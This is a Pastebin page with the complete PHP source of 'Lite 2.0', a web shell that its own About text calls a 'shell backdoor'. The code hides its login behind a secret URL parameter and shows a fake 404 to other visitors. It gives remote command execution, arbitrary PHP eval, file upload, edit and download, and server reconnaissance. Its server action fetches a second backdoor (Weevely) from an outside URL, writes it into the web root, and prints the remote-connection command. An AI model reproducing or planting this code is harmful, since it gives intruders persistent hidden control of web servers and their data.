API tools faq
paste
Advertisement
shutdown57

Lite 2.0

shutdown57
Jun 22nd, 2022
429
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 28.33 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. @session_start();
  4. @ob_start();
  5. set_time_limit(0);
  6. error_reporting(0);
  7. header("X-XSS-Protection: 0");
  8.  
  9.  
  10.  
  11. $config = array();
  12. $config['username'] = "lite"; // username
  13. $config['password'] = "lite"; // password
  14. $config['default_action'] = "filemanager"; // upload , php , command , server , filemanager.
  15. $config['version'] = "2.0-2022"; // version.subversion-revision
  16. $config['hidden_login'] = true; // if true lite login be hidden and for accessing login page , u must add parameter in last filename like "shell.php?parameter" , for parameter config on the bellow
  17. $config['parameter'] = 'lite_login'; // parameter for accessing login page if hidden_login true. "shell.php?lite_login" for default parameter.
  18. /**
  19.  *
  20.  * /-----------------------------------/
  21.  * / Lite define path,action,etc.      /
  22.  * /-----------------------------------/
  23.  */
  24. define('ROOT', getcwd());
  25. define('CURR_PATH', (empty($_GET['p'])) ? ROOT : $_GET['p']);
  26. define('ACTION', (empty($_GET['a'])) ? $config['default_action'] : $_GET['a']);
  27. define('DS', DIRECTORY_SEPARATOR);
  28.  
  29. // login form function
  30. function form_login()
  31. {
  32.     echo "<div style='margin-top:50px;'><center><img src='https://seeklogo.com/images/L/l-letter-from-death-note-logo-6999722A33-seeklogo.com.png'><h3>Lite shell.</h3>";
  33.     echo "<form method='post'><br><input type='text' name='username' placeholder='username' style='width:200px'><br><input type='password' name='password' placeholder='password' style='width:200px'><br><br><input type='submit' value='Login' name='login' style='width:200px'></form></center></div>";
  34. }
  35.  
  36. // login authetication
  37. if (empty($_SESSION['lite1337']) && !empty($config['username']) && !empty($config['password'])) {
  38.     if ($config['hidden_login'] === true) {
  39.  
  40.         if (isset($_GET[$config['parameter']])) {
  41.             form_login();
  42.         } else {
  43.             die(header('HTTP/1.1 404 Not Found'));
  44.         }
  45.     } else {
  46.         form_login();
  47.     }
  48.     if (isset($_POST['login'])) {
  49.         if ($_POST['username'] == $config['username'] && $_POST['password'] == $config['password']) {
  50.             $_SESSION['lite1337'] = true;
  51.             echo "<meta http-equiv='refresh' content='0;url=?login={$config['username']}_{$config['password']}'>";
  52.         }
  53.     }
  54.     exit;
  55. }
  56.  
  57. function lite_curpath($path, $goto)
  58. {
  59.     $dir = str_replace("\\", "/", $path);
  60.     $dir = (is_file($dir)) ? dirname($dir) : $dir;
  61.     $dir = explode("/", $dir);
  62.     foreach ($dir as $o => $i) {
  63.         if ($i == "" && $o == 0) {
  64.             echo "<a href=\"?" . $goto . "=/\">/</a>";
  65.             continue;}
  66.         if ($i == "") {
  67.             continue;
  68.         }
  69.  
  70.         echo "<a href=\"?" . $goto . "=";
  71.         for ($p = 0; $p <= $o; $p++) {
  72.             echo $dir[$p];if ($p != $o) {
  73.                 echo "/";}}
  74.         echo "&a=filemanager\">" . $i . "</a>/";}
  75.     if (is_writable($path)) {echo "- [<b><font color=lime>W</font></b>]";} elseif (is_readable($path)) {echo "- [<b><font color=red>R</font></b>]";} else {echo "- [<b><font color=grey>Unknown</font></b>]<meta http-equiv='refresh' content='4;url=?'>";}
  76.     echo "[<a href='?a=logout'><font color=red>Logout</font></a>]";
  77. }
  78.  
  79. function lite_filesize($file)
  80. {
  81.     $size = filesize($file) / 1024;
  82.     $size = round($size, 3);
  83.     if ($size > 1024) {
  84.         $size = round($size / 1024, 2) . 'MB';
  85.     } else {
  86.         $size = $size . 'KB';}
  87.     return $size;
  88. }
  89. function lite_lastmod($file)
  90. {
  91.     $fdm = @date("d-m-Y H:i:s", filemtime($file));
  92.     return $fdm;
  93. }
  94. function lite_perms($file)
  95. {
  96.     $perms = fileperms($file);
  97.     if (($perms&0xC000) == 0xC000) {
  98.         $info = 's';} elseif (($perms&0xA000) == 0xA000) {$info = 'l';} elseif (($perms&0x8000) == 0x8000) {$info = '-';} elseif (($perms&0x6000) == 0x6000) {$info = 'b';} elseif (($perms&0x4000) == 0x4000) {$info = 'd';} elseif (($perms&0x2000) == 0x2000) {$info = 'c';} elseif (($perms&0x1000) == 0x1000) {$info = 'p';} else { $info = 'u';}
  99.     $info .= (($perms&0x0100) ? 'r' : '-');
  100.     $info .= (($perms&0x0080) ? 'w' : '-');
  101.     $info .= (($perms&0x0040) ? (($perms&0x0800) ? 's' : 'x') : (($perms&0x0800) ? 'S' : '-'));
  102.     $info .= (($perms&0x0020) ? 'r' : '-');
  103.     $info .= (($perms&0x0010) ? 'w' : '-');
  104.     $info .= (($perms&0x0008) ? (($perms&0x0400) ? 's' : 'x') : (($perms&0x0400) ? 'S' : '-'));
  105.     $info .= (($perms&0x0004) ? 'r' : '-');
  106.     $info .= (($perms&0x0002) ? 'w' : '-');
  107.     $info .= (($perms&0x0001) ? (($perms&0x0200) ? 't' : 'x') : (($perms&0x0200) ? 'T' : '-'));
  108.     return $info;
  109. }
  110. function lite_action($dir, $action)
  111. {
  112.     $a = "";
  113.     $x = basename($dir);
  114.     if ($action == 'dir') {$a .= "[ ";
  115.         $a .= "<a href='?p={$dir}&a=delete' title='delete : {$x}'><i class='fa fa-trash'></i></a> / ";
  116.         $a .= "<a href='?p={$dir}&a=rename' title='rename : {$x}'><i class='fa fa-file-signature'></i></a> ";
  117.         $a .= "]";
  118.     } elseif ($action == 'file') {$a .= "[ ";
  119.         $a .= "<a href='?p={$dir}&a=delete' title='delete : {$x}'><i class='fa fa-trash'></i></a> / ";
  120.         $a .= "<a href='?p={$dir}&a=rename' title='rename : {$x}'><i class='fa fa-file-signature'></i></a> / ";
  121.         $a .= "<a href='?p={$dir}&a=edit' title='edit : {$x}'><i class='fa fa-pencil-alt'></i></a> / ";
  122.         $a .= "<a href='?p={$dir}&a=dl' title='download : {$x}'><i class='fa fa-download'></i></a> ]";
  123.     }
  124.  
  125.     return $a;
  126. }
  127. function lite_action2($dir)
  128. {
  129.     $p = $dir;
  130.     $a = "<br><hr><table class='table table-responsive table-striped'><tr><td>";
  131.     $a .= "Filesname </td><td><b> " . basename($dir) . "</b>  </td></tr><tr><td>";
  132.     $a .= "Permission </td><td><b> " . lite_perms($dir) . "</b>  </td></tr><tr><td>";
  133.     $a .= "File size  </td><td><b> " . lite_filesize($dir) . "</b>  </td></tr><tr><td>";
  134.     $a .= "Last modified </td><td><b> " . lite_lastmod($dir) . "</b> </td></tr><tr><td> ";
  135.     $a .= "Action  </td><td>";
  136.     $a .= "<a href='?p={$p}&a=rename' class='btn btn-warning'>Rename</a>&nbsp;";
  137.     $a .= "<a href='?p={$p}&a=delete' class='btn btn-danger'>Delete</a>&nbsp;";
  138.     $a .= "<a href='?p={$p}&a=edit' class='btn btn-primary'>Edit</a>&nbsp;";
  139.     $a .= "<a href='?p={$p}&a=dl' class='btn btn-success'>Download</a>&nbsp;";
  140.     $a .= "</td></tr></table><hr>";
  141.     return $a;
  142. }
  143. function lite_delete($dir)
  144. {
  145.     if (is_dir($dir)) {
  146.         if (!rmdir($dir)) {
  147.             $s = scandir($dir);
  148.             foreach ($s as $ss) {
  149.                 if (is_file($dir . "/" . $ss)) {
  150.                     if (unlink($dir . "/" . $ss)) {
  151.                         $rm = rmdir($dir);
  152.                     }
  153.                 }
  154.                 if (is_dir($dir . "/" . $ss)) {
  155.                     $rm = rmdir($dir . "/" . $ss);
  156.                     $rm .= rmdir($dir);
  157.                 }
  158.             }
  159.         } elseif (is_file($dir)) {
  160.             $rm = unlink($dir);
  161.         }
  162.     } elseif (is_file($dir)) {
  163.         $rm = unlink($dir);
  164.     }
  165.     return $rm;
  166. }
  167.  
  168. function lite_cmd($cmd)
  169. {
  170.     if (function_exists('system')) {
  171.         @ob_start();
  172.         @system($cmd);
  173.         $c = @ob_get_contents();
  174.         @ob_end_clean();
  175.         return $c;
  176.     } elseif (function_exists('exec')) {
  177.         @exec($cmd, $results);
  178.         $c = "";
  179.         foreach ($results as $result) {
  180.             $c .= $result;
  181.         }
  182.         return $c;
  183.     } elseif (function_exists('passthru')) {
  184.         @ob_start();
  185.         @passthru($cmd);
  186.         $c = @ob_get_contents();
  187.         @ob_end_clean();
  188.         return $c;
  189.     } elseif (function_exists('shell_exec')) {
  190.         $c = @shell_exec($cmd);
  191.         return $c;
  192.     }
  193. }
  194. function lite_redirect($kemana, $apa = 'html')
  195. {
  196.     if ($apa == 'html') {
  197.         echo "<meta http-equiv='refresh' content='0;url={$kemana}'>";
  198.     } elseif ($apa == 'js') {
  199.         echo "<script>window.location.href='{$kemana}';</script>";
  200.     } elseif ($apa == 'php') {
  201.         @ob_start();
  202.         header('location:' . $kemana);
  203.         flush();
  204.     }
  205. }
  206. function lite_download($file)
  207. {
  208.     @ob_clean();
  209.     header('Content-Description: File Transfer');
  210.     header('Content-Type: application/octet-stream');
  211.     header('Content-Disposition: attachment; filename="' . basename($file) . '"');
  212.     header('Expires: 0');
  213.     header('Cache-Control: must-revalidate');
  214.     header('Pragma: public');
  215.     header('Content-Length: ' . filesize($file));
  216.     readfile($file);
  217.     exit;
  218. }
  219. function lite_upload($a, $b)
  220. {
  221.     if (function_exists('move_uploaded_file')) {
  222.         $upl = move_uploaded_file($a, $b);
  223.     } elseif (function_exists('copy')) {
  224.         $upl = copy($a, $b);
  225.     }
  226.     return $upl;
  227. }
  228. function lite_array_upload($file)
  229. {
  230.     $file_ary = array();
  231.     $file_count = count($file['name']);
  232.     $file_key = array_keys($file);
  233.     for ($i = 0; $i < $file_count; $i++) {
  234.         foreach ($file_key as $val) {
  235.             $file_ary[$i][$val] = $file[$val][$i];
  236.         }
  237.     }
  238.     return $file_ary;
  239. }
  240. function lite_title($text)
  241. {
  242.     echo "<br><hr>";
  243.     echo "<center><h3>..:: $text ::..</h3></center>";
  244.     echo "<hr><br>";
  245. }
  246. function lite_sysfo()
  247. {
  248.     $mysql = (function_exists('mysql_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  249.     $mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  250.     $wget = (lite_cmd('wget --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  251.     $curl = (function_exists('curl_init')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  252.     $perl = (lite_cmd('perl --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  253.     $python = (lite_cmd('python --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  254.     $bash = (lite_cmd('bash --version')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  255.     $gcc = (lite_cmd('gcc --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  256.     $sm = (ini_get('safe_mode') == 'on') ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  257.     $df = (ini_get('disable_functions')) ? wordwrap(ini_get('disable_functions'), 100, "\n", true) : "<font color=red>NO !</font>";
  258.     $sysfo = [
  259.         'Hostname' => $_SERVER['HTTP_HOST'],
  260.         'System' => php_uname(),
  261.         'PHP_version' => phpversion(),
  262.         'Software' => $_SERVER['SERVER_SOFTWARE'],
  263.         'IP_Server' => gethostbyname($_SERVER['HTTP_HOST']),
  264.         'IP_Client' => $_SERVER['REMOTE_ADDR'],
  265.         'MySQL' => $mysql,
  266.         'MySQLi' => $mysqli,
  267.         'Wget' => $wget,
  268.         'Curl' => $curl,
  269.         'Perl' => $perl,
  270.         'Python' => $python,
  271.         'Bash' => $bash,
  272.         'gcc' => $gcc,
  273.         'Safe_mode' => $sm,
  274.         'disable_functions' => $df];
  275.     return $sysfo;
  276. }
  277. ?>
  278. <!DOCTYPE html>
  279. <html lang="en">
  280.     <head>
  281.         <meta charset="utf-8" />
  282.         <link rel="icon" href="https://seeklogo.com/images/L/l-letter-from-death-note-logo-6999722A33-seeklogo.com.png">
  283.         <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  284.         <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
  285.         <meta name="description" content="" />
  286.         <meta name="author" content="" />
  287.         <title>(<?=$_SERVER['HTTP_HOST'];?>) <?=strtoupper(ACTION);?> - Lite 2.0</title>
  288.         <link href="https://cdn.jsdelivr.net/npm/simple-datatables@latest/dist/style.css" rel="stylesheet" />
  289.         <link href="https://fahmisyahya.w3spaces.com/sbadmin.css" rel="stylesheet" />
  290.         <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/js/all.min.js" crossorigin="anonymous"></script>
  291.     </head>
  292.     <body class="sb-nav-fixed">
  293.         <nav class="sb-topnav navbar navbar-expand navbar-dark bg-dark">
  294.             <!-- Navbar Brand-->
  295.             <a class="navbar-brand ps-3" href="?">Lite 2.0</a>
  296.             <!-- Sidebar Toggle-->
  297.             <button class="btn btn-link btn-sm order-1 order-lg-0 me-4 me-lg-0" id="sidebarToggle" href="#!"><i class="fas fa-bars"></i></button>
  298.             <form class="d-none d-md-inline-block form-inline ms-5 w-75" method="get">
  299.                 <div class="input-group">
  300.                     <input class="form-control" type="text" name="p" placeholder="Go to directory" value="<?=CURR_PATH;?>"  />
  301.                     <button class="btn btn-primary" id="btnNavbarSearch" type="button"><i class="fas fa-arrow-right"></i></button>
  302.                 </div>
  303.             </form>
  304.         </nav>
  305.         <div id="layoutSidenav">
  306.             <div id="layoutSidenav_nav">
  307.                 <nav class="sb-sidenav accordion sb-sidenav-dark" id="sidenavAccordion">
  308.                     <div class="sb-sidenav-menu">
  309.                         <div class="nav">
  310.                             <div class="sb-sidenav-menu-heading">Lite Menu</div>
  311.                             <a class="nav-link" href="?p=<?=CURR_PATH;?>&a=filemanager">
  312.                                 <div class="sb-nav-link-icon"><i class="fas fa-folder"></i></div>
  313.                                 File Manager
  314.                             </a>
  315.                             <a class="nav-link" href="?p=<?=CURR_PATH;?>&a=upload">
  316.                                 <div class="sb-nav-link-icon"><i class="fas fa-upload"></i></div>
  317.                                 Upload
  318.                             </a>
  319.                             <a class="nav-link" href="?p=<?=CURR_PATH;?>&a=php">
  320.                                 <div class="sb-nav-link-icon"><i class="fab fa-php"></i></div>
  321.                                 Eval
  322.                             </a>
  323.                             <a class="nav-link" href="?p=<?=CURR_PATH;?>&a=command">
  324.                                 <div class="sb-nav-link-icon"><i class="fas fa-terminal"></i></div>
  325.                                 Command
  326.                             </a>
  327.                             <a class="nav-link" href="?p=<?=CURR_PATH;?>&a=php">
  328.                                 <div class="sb-nav-link-icon"><i class="fas fa-info"></i></div>
  329.                                 PHPInfo
  330.                             </a>
  331.                             <a class="nav-link" href="?p=<?=CURR_PATH;?>&a=server">
  332.                                 <div class="sb-nav-link-icon"><i class="fas fa-server"></i></div>
  333.                                 Server Info
  334.                             </a>
  335.                             <a class="nav-link" href="?a=logout">
  336.                                 <div class="sb-nav-link-icon"><i class="fa fa-sign-out"></i></div>
  337.                                 Logout
  338.                             </a>
  339.  
  340.                 </nav>
  341.             </div>
  342.             <div id="layoutSidenav_content">
  343.                 <main>
  344.                     <div class="container-fluid mt-5 px-4">
  345.  
  346.                      <?php
  347. if (ACTION == 'filemanager') {
  348.     ?>
  349.                         <div class="card mb-4">
  350.                             <div class="card-header">
  351.                                 <i class="fas fa-table me-1"></i>
  352.                                 FileManager ( <?=lite_curpath(CURR_PATH, 'p');?> )
  353.                             </div>
  354.                             <div class="card-body">
  355.                                 <form method="post">
  356.                                 <table id="datatablesSimple">
  357.                                     <thead>
  358.                                         <tr>
  359.                                             <th><input type="checkbox" name="fl[]" onclick="select_all(this)"></th>
  360.                                             <th>Files</th>
  361.                                             <th>Size</th>
  362.                                             <th>Last Modified</th>
  363.                                             <th>Permission</th>
  364.                                             <th>Action</th>
  365.                                         </tr>
  366.                                     </thead>
  367.  
  368.                                     <tbody>
  369.         <tr><td></td><td><a href="?p=<?=dirname(CURR_PATH);?>&a=filemanager"><i class="fa fa-long-arrow-alt-left"></i> Back</a></td><td></td><td></td><td></td><td align="right"><a href="?p=<?=CURR_PATH;?>&a=newfile"><i class="fa fa-plus"></i> file </a>|<a href="?p=<?=CURR_PATH;?>&a=newdir"><i class="fa fa-plus"></i> dir</a></td></tr>
  370.         <?php
  371. $s = scandir(CURR_PATH);
  372.     @chdir(CURR_PATH);
  373.     foreach ($s as $d) {if (!is_dir(CURR_PATH . DS . $d) || $d == '.' || $d == '..') {
  374.         continue;
  375.     }
  376.  
  377.         $perm = (is_writable(CURR_PATH . DS . $d)) ? "<font color=lime>" . lite_perms(CURR_PATH . DS . $d) . "</font>" : "<font color=red>" . lite_perms(CURR_PATH . DS . $d) . "</font>";
  378.         echo "<tr title='Dir : {$d}'>";
  379.         echo "<td><input type='checkbox' name='fl[]' value='" . CURR_PATH . DS . "{$d}'></td>";
  380.         echo "<td><i class='fa fa-folder'></i> <a href='?p=" . CURR_PATH . DS . $d . "&a=filemanager'>{$d}</a></td>";
  381.         echo "<td>" . lite_filesize(CURR_PATH . DS . $d) . "</td>";
  382.         echo "<td>" . lite_lastmod(CURR_PATH . DS . $d) . "</td>";
  383.         echo "<td>" . $perm . "</td>";
  384.         echo "<td align='right'>" . lite_action(CURR_PATH . DS . $d, 'dir') . "</td>";
  385.         echo "</tr>";
  386.     }
  387.     foreach ($s as $f) {if (!is_file(CURR_PATH . DS . $f) || $f == '.' || $f == '..') {
  388.         continue;
  389.     }
  390.  
  391.         $perm = (is_writable(CURR_PATH . DS . $f)) ? "<font color=lime>" . lite_perms(CURR_PATH . DS . $f) . "</font>" : "<font color=red>" . lite_perms(CURR_PATH . DS . $f) . "</font>";
  392.         echo "<tr title='file : {$f}'>";
  393.         echo "<td><input type='checkbox' name='fl[]' value='" . CURR_PATH . DS . "{$f}'></td>";
  394.         echo "<td><i class='fa fa-file'></i> <a href='?p=" . CURR_PATH . DS . $f . "&a=view'>{$f}</a></td>";
  395.         echo "<td>" . lite_filesize(CURR_PATH . DS . $f) . "</td>";
  396.         echo "<td>" . lite_lastmod(CURR_PATH . DS . $f) . "</td>";
  397.         echo "<td>" . $perm . "</td>";
  398.         echo "<td align='right'>" . lite_action(CURR_PATH . DS . $f, 'file') . "</td>";
  399.         echo "</tr>";
  400.     }
  401.     ?>
  402.  
  403.     </tbody>
  404.                                 </table>
  405.  
  406.                             <div class="container-fluid">
  407.                                 <label>Action for multiple select :</label>
  408.                                 <select name="action" class="form-control">
  409.                                     <option>---[ action ]---</option>
  410.                                 <option value="delete">DELETE</option>
  411.                                 <?php
  412. if (empty($_SESSION['cfile'])) {
  413.         ?>
  414.           <option value="copy">COPY</option>
  415.           <?php
  416. } else {
  417.         ?><option value="paste">PASTE</option><?php
  418. }
  419.     ?>
  420.         </select>  <input type="submit" name="sac" class="btn btn-primary" value=">>" >
  421. </form>
  422.                             </div>
  423.                             </div>
  424.                         </div>
  425.                         <?php
  426.  
  427.     if (isset($_POST['sac'])) {
  428.         if ($_POST['action'] == 'delete') {
  429.             foreach ($_POST['fl'] as $dfil) {
  430.                 @lite_delete($dfil);
  431.             }
  432.             @lite_redirect('?p=' . CURR_PATH . '&a=filemanager');
  433.         } elseif ($_POST['action'] == 'copy') {
  434.             $_SESSION['cfile'] = $_POST['fl'];
  435.             @lite_redirect('?p=' . CURR_PATH . '&a=filemanager');
  436.         } elseif ($_POST['action'] == 'paste') {
  437.             foreach ($_SESSION['cfile'] as $paste) {
  438.                 copy($paste, CURR_PATH . DS . basename($paste));
  439.             }
  440.             unset($_SESSION['cfile']);
  441.             @lite_redirect('?p=' . CURR_PATH . '&a=filemanager');
  442.         }
  443.  
  444.     }
  445. } elseif (ACTION == 'view') {
  446.     echo lite_action2(CURR_PATH);
  447.     echo '<textarea readonly="" class="form-control" style="width:100%;height:500px">' . htmlspecialchars(file_get_contents(CURR_PATH)) . '</textarea>';
  448. } elseif (ACTION == 'delete') {
  449.     @lite_delete(CURR_PATH);
  450.     @lite_redirect('?p=' . dirname(CURR_PATH));
  451. } elseif (ACTION == 'rename') {
  452.     echo lite_action2(CURR_PATH);
  453.     echo "<form method=post><div class='row'><div class='col'>";
  454.     echo "<label>New name : </label></div><div class='col'>";
  455.     echo "<input type='text' name='newname' placeholder='lite.php' class='form-control'></div><div class='col'>";
  456.     echo "<input type='submit' name='s' value='save' class='btn btn-primary'></div></div>";
  457.     echo "</form>";
  458.     if (isset($_POST['s'])) {
  459.         $newname = dirname(CURR_PATH) . DS . $_POST['newname'];
  460.         @rename(CURR_PATH, $newname);
  461.         @lite_redirect('?p=' . dirname(CURR_PATH));
  462.     }
  463.  
  464. } elseif (ACTION == 'edit') {
  465.     echo lite_action2(CURR_PATH);
  466.     echo "<form method=post>";
  467.     echo "<textarea name='konten' class='form-control' style='width:100%;height:500px'>" . htmlspecialchars(file_get_contents(CURR_PATH)) . "</textarea><br>";
  468.     echo "<input type='submit' name='s' value='save'  style='width:200px' class='btn btn-primary'>";
  469.     echo "</form>";
  470.     if (isset($_POST['s'])) {
  471.         $konten = $_POST['konten'];
  472.         $fp = fopen(CURR_PATH, 'w');
  473.         fwrite($fp, $konten);
  474.         fclose($fp);
  475.         @lite_redirect('?p=' . dirname(CURR_PATH));
  476.     }
  477. } elseif (ACTION == 'dl') {
  478.     echo lite_action2(CURR_PATH);
  479.     @lite_download(CURR_PATH);
  480. } elseif (ACTION == 'upload') {
  481.     lite_title('Upload file ( multiple )');
  482.     echo "<form method='post' enctype='multipart/form-data'><div class='row'><div class='col-md-3'>";
  483.     echo "<label>Upload to : </label></div><div class='col'>";
  484.     echo "<input type='text' name='targetdir' value='" . CURR_PATH . "' class='form-control'><br><br></div></div><div class='row'>";
  485.     echo "<div class='col-md-3'><label>Select file : </label></div>";
  486.     echo "<div class='col'><input type='file' name='flite[]' class='form-control'  multiple></div></div>";
  487.     echo "<br><input type='submit' name='upload' value='Upload !' style='width:300px' class='btn btn-primary'><br><br>";
  488.  
  489.     if (isset($_POST['upload'])) {
  490.         $list_file = lite_array_upload($_FILES['flite']);
  491.         foreach ($list_file as $file) {$uf = $_POST['targetdir'] . DS . $file['name'];
  492.             if (lite_upload($file['tmp_name'], $uf)) {
  493.                 $msg .= "[<font color=lime>SUCCESS</font>] Uploaded file : $uf <br>";
  494.             } else {
  495.                 $msg .= "[<font color=red>FAILED</font>] Upload file : $uf <br>";
  496.             }
  497.         }
  498.         echo $msg;
  499.     }
  500. } elseif (ACTION == 'command') {
  501.     lite_title('Command');
  502.     echo "<form method=post><div class='row'><div class='col-md-2'>";
  503.     echo "<label>lite@console :: </label></div><div class='col-md-8'>";
  504.     echo "<input type='text' name='cmd' class='form-control'></div><div class='col-md-2'>";
  505.     echo "<input type='submit' value='Execute' class='btn btn-primary'></div></div>";
  506.     if (isset($_POST['cmd'])) {
  507.         echo "<br>";
  508.         echo "<hr>";
  509.         echo "<pre>";
  510.         echo lite_cmd($_POST['cmd']);
  511.         echo "</pre>";
  512.  
  513.     }
  514. } elseif (ACTION == 'php') {
  515.     ?>
  516.     <script type="text/javascript">
  517.         window.onload = function()
  518.         {
  519.             document.getElementById('eval').style.display='block';
  520.         }
  521.         function sh(w,u)
  522.         {
  523.             document.getElementById(w).style.display='block';
  524.             document.getElementById(u).style.display='none';
  525.         }
  526.     </script>
  527.     <?php
  528. lite_title('PHP');
  529.     echo "<center>";
  530.     echo "PHP version : " . phpversion();
  531.     echo "<br>[<a href='#' onclick=\"sh('phpinfo','eval')\">phpinfo</a>][<a href='#' onclick=\"sh('eval','phpinfo')\">eval</a>]</center>";
  532.  
  533.     echo "<div id='phpinfo' style='display:none;'>";
  534.     @ob_start();
  535.     @eval("phpinfo();");
  536.     $pxp = @ob_get_contents();
  537.     @ob_end_clean();
  538.     $awal = strpos($pxp, "<body>") + 6;
  539.     $akhir = strpos($pxp, "</body>");
  540.     echo "<center>" . substr($pxp, $awal, $akhir - $awal) . "</center>";
  541.     echo "</div>";
  542.     echo "<div id='eval' style='display:none;'><br>";
  543.     echo "<form method=post><textarea name='eval' class='form-control' style='width:80%;height:300px;margin:0 auto;'>echo 'hello';</textarea><br>";
  544.     echo "<input type='submit' name='run' value='Run !' class='btn btn-primary w-100'><br>";
  545.     echo "</div>";
  546.  
  547.     if (isset($_POST['run'])) {
  548.         $eval = $_POST['eval'];
  549.         echo "<hr>";
  550.         @eval($eval);
  551.     }
  552.  
  553. } elseif (ACTION == 'server') {
  554.     if (!file_exists(ROOT . DS . 'weevely.php')) {
  555.         $fp = fopen(ROOT . DS . 'weevely.php', 'w');
  556.         fwrite($fp, @file_get_contents('https://raw.githubusercontent.com/justalinko/justalinko.github.io/master/jshell/Jweevely.php'));
  557.         fclose($fp);
  558.     }
  559.     lite_title('Server');
  560.     echo "<center>[<a href='#' onclick=\"hs('sysfo','weevely')\">Server info</a>] [<a href='#' onclick=\"hs('weevely','sysfo')\">Weevely</a>]</center>";
  561.     echo "<hr>";
  562.     echo "<table width=100% id='sysfo'>";
  563.     foreach (lite_sysfo() as $name => $val) {
  564.         echo "<tr><td>{$name}</td><td>{$val}</td></tr>";
  565.     }
  566.     echo "</table>";
  567.  
  568.     echo "<div id='weevely' style='display:none'>";
  569.     if (file_exists(ROOT . DS . 'weevely.php')) {
  570.         echo "<font color=lime> Weevely available.</font> open your terminal and remote weevely :D <br>";
  571.         echo "$ python weevely.py http://" . $_SERVER['HTTP_HOST'] . "/weevely.php jshellv1 <br>";
  572.     } else {
  573.         echo "Weevely not exists";
  574.     }
  575. } elseif (ACTION == 'newfile') {
  576.     lite_title('New file');
  577.     echo "<form method=post>";
  578.     echo "<textarea name='konten'></textarea><br>";
  579.     echo "<label>Save as :</label><input type='text' name='targetdir' value='" . CURR_PATH . DS . "newfile.php' style='width:60%'>";
  580.     echo "<input type='submit' name='s' value='save'  style='width:200px'>";
  581.     echo "</form>";
  582.     if (isset($_POST['s'])) {
  583.         $konten = $_POST['konten'];
  584.         $fp = fopen($_POST['targetdir'], 'w');
  585.         fwrite($fp, $konten);
  586.         fclose($fp);
  587.         @lite_redirect('?p=' . dirname(CURR_PATH));
  588.     }
  589. } elseif (ACTION == 'newdir') {
  590.     echo "<form method=post>";
  591.     echo "<label>Make dir : </label>";
  592.     echo "<input type='text' name='dir' placeholder='directory' style='width:300px'>";
  593.     echo "<input type='submit' name='s' value='save'>";
  594.     echo "</form>";
  595.     if (isset($_POST['s'])) {
  596.         $newname = CURR_PATH . DS . $_POST['dir'];
  597.         @mkdir($newname);
  598.         @lite_redirect('?p=' . CURR_PATH);
  599.     }
  600. } elseif (ACTION == 'logout') {
  601.     session_destroy();
  602.     @lite_redirect('?');
  603. } elseif (ACTION == 'lite') {
  604.     lite_title("LITE WebBackdoor v1.0");
  605.     echo "<pre>";
  606.     echo "<h3>About</h3>";
  607.     echo "<p>   <b>Lite</b> is a simple and lightweight shell backdoor for excute shell command,filemanager and other.<br>Made with purpose needs penetration testing or filemanager only.</p>";
  608.     echo "<h3>Configuration</h3>";
  609.     foreach ($config as $name => $value) {
  610.         echo "<font color=green>{$name}</font> ::: <font color=lime>{$value}</font><br>";
  611.     }
  612.  
  613.     echo "</pre>";
  614. }
  615.  
  616. ?>
  617.  
  618.                     </div>
  619.                 </main>
  620.                 <footer class="py-4 bg-light mt-auto">
  621.                     <div class="container-fluid px-4">
  622.                         <div class="d-flex align-items-center justify-content-between small">
  623.                             <div class="text-muted">Copyright &copy; Lite Admin</div>
  624.                         </div>
  625.                     </div>
  626.                 </footer>
  627.             </div>
  628.         </div>
  629.         <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
  630.        <script>
  631.         window.addEventListener('DOMContentLoaded', event => {
  632.  
  633. // Toggle the side navigation
  634. const sidebarToggle = document.body.querySelector('#sidebarToggle');
  635. if (sidebarToggle) {
  636.     // Uncomment Below to persist sidebar toggle between refreshes
  637.     // if (localStorage.getItem('sb|sidebar-toggle') === 'true') {
  638.     //     document.body.classList.toggle('sb-sidenav-toggled');
  639.     // }
  640.     sidebarToggle.addEventListener('click', event => {
  641.         event.preventDefault();
  642.         document.body.classList.toggle('sb-sidenav-toggled');
  643.         localStorage.setItem('sb|sidebar-toggle', document.body.classList.contains('sb-sidenav-toggled'));
  644.     });
  645. }
  646.  
  647. });
  648. window.addEventListener('DOMContentLoaded', event => {
  649.     // Simple-DataTables
  650.     // https://github.com/fiduswriter/Simple-DataTables/wiki
  651.  
  652.     const datatablesSimple = document.getElementById('datatablesSimple');
  653.     if (datatablesSimple) {
  654.         new simpleDatatables.DataTable(datatablesSimple);
  655.     }
  656. });
  657.  
  658.        </script>
  659.         <script src="https://cdn.jsdelivr.net/npm/simple-datatables@latest" crossorigin="anonymous"></script>
  660.  
  661.     </body>
  662. </html>
  663.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!